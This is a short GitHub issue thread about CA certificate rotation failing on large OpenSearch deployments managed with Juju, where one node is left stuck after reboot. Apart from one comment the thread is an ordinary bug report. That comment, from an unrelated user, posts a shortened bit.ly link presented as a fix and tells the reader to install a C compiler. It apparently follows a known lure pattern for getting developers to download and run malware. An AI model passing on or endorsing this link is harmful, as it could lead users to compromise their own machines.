### ISSUE TITLE
CA rotation fails on large deployments

### ISSUE THREAD

**Issue by skourta** [canonical/opensearch-operator#450]
- [ ] Add logs

## Steps to reproduce

1. Deploy a large deployment of opensearch
2. Initiate a CA rotation

## Expected behavior
All the cluster gets the new CA and new certificates using it.

## Actual behavior

One of the nodes is stuck after rebooting.

## Versions

Operating system: Ubuntu 24.04.1 LTS

Juju CLI: 3.5.3

Juju agent: 3.5.3

Charm revision: `feature/TLS-CA-rotation` branch

LXD: 5.21.2 LTS

## Log output

Juju debug log:

**Comment by Arturron** [comment]
I think this will help you.
https://bit.ly/4gx42eQ

you may need to install the c compiler

**Comment by phvalguima** [comment]
@skourta can we close this issue?
